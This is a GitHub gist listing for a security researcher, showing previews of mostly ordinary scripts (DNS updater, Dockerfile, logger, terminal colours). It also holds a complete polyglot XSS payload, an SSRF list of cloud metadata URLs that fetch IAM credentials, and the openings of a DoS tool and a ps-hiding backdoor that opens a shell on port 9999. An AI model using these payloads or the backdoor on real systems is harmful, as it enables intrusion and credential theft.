Skip to content

Instantly share code, notes, and snippets.

Emilio epinna

Block or report user

Report or block epinna

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@epinna
epinna / namecheap_ddns.py
Created Nov 4, 2018 — forked from j796160836/namecheap_ddns.py
Python scripts for update DNS record for Namecheap (DDNS Services update script)
View namecheap_ddns.py
#!/usr/bin/env python
# encoding: utf-8
# Setup introductions:
# Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS
# (Accounts > Domain List > Advanced DNS)
# Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address.
# Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password).
# Run and have fun!
@epinna
epinna / cloud_metadata.txt
Created Jul 27, 2018 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@epinna
epinna / Dockerfile
Last active Jan 17, 2019
Playground docker image
View Dockerfile
FROM ubuntu:latest
ARG LOCALE=en_US
ARG CHARMAP=UTF-8
ARG DEBIAN_FRONTEND=noninteractive
RUN dpkg --add-architecture i386
RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \
autoconf \
apache2 \
@epinna
epinna / logger.py
Created May 17, 2017
Python message format based on message logging level in Python 3
View logger.py
# Tested with Python 3.5.2
from config import LOGLEVEL
import logging
class SrvLogFormat(logging.Formatter):
err_fmt = "[E] %(msg)s"
warn_fmt = "[!] %(msg)s"
dbg_fmt = "[D] %(module)s: %(lineno)d: %(msg)s"
@epinna
epinna / XSh0k.c
Created Jan 31, 2017
Lame DoS by teenager me
View XSh0k.c
/* 2/5/00 1.0
Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw.
main code by AcidCrash -- NeURaL CoLLaPsE CrEw.
This dos simply creates a sequence of socket connections to Xwindow port
of a remote server. This cause a very disturbing effect to the XWindow user.
There are many and various effects: frequently Xwindow slows so much that
it's quite impossible to start new X programs; sometimes Xwindow don't
recognizes some keys or mouse input, and, more rarely it crash and
leave the user to the bash.
View keybase_proof.md

Keybase proof

I hereby claim:

  • I am epinna on github.
  • I am epinna (https://keybase.io/epinna) on keybase.
  • I have a public key whose fingerprint is 05F1 954C E1FB 4611 F742 8DF4 2041 EEA1 A192 B451

To claim this, I am signing this object:

View polyglot_xss.html
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
@epinna
epinna / pypest.py
Last active Jan 25, 2019
Hackish one-liner memory-only backdoor agent which hides from ps
View pypest.py
#!/usr/bin/env python
# This script prints a simple one-liner memory-only backdoor agent which hides from ps.
# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)
template = """
import sys,re,pty,os,socket
@epinna
epinna / colors.py
Created Oct 14, 2014
Retro ANSI colors
View colors.py
'''
Set ANSI Terminal Color and Attributes.
http://code.activestate.com/recipes/574451-handling-ansi-terminal/
'''
from sys import stdout
esc = '%s['%chr(27)
reset = '%s0m'%esc
View chroot_qemu.sh
#!/bin/bash
ROOTFS='.'
EMU_BIN_NAME='qemu-arm-static'
EMU_BIN_FOLDER='/usr/bin/'
SHELL='/bin/sh'
cd "${ROOTFS}"
sudo mount -t proc proc proc/
sudo mount --rbind /sys sys/
sudo mount --rbind /dev dev/
You can’t perform that action at this time.